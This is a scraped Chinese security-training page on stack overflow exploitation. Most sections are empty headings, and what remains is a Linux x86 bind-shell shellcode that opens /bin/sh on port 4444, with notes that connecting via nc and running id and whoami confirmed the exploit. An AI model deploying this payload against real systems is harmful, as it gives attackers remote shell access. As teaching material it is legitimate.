本文来源:蚁景科技
- 0x00
- 0x01
- 0x02
- 0x03
- 0x04
- 0x05
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" \ "\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a" \ "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" \ "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" \ "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" \ "\x0b\xcd\x80" 完整的代码如下所示 运行脚本 然后使用nc监听本地4444端口 下图使用了id,whoami,ls命令进行了测试 说明我们成功进行了漏洞利用
- 0x06
- 0x07
转载请注明来自网盾网络安全培训,本文标题:《漏洞研究之网络编程与堆栈溢出技术》
标签:网安知识
- 上一篇: 某企业授权渗透报告
- 下一篇: 疫情夜幕下的2020:上半年度PC端网络安全威胁Top 10盘点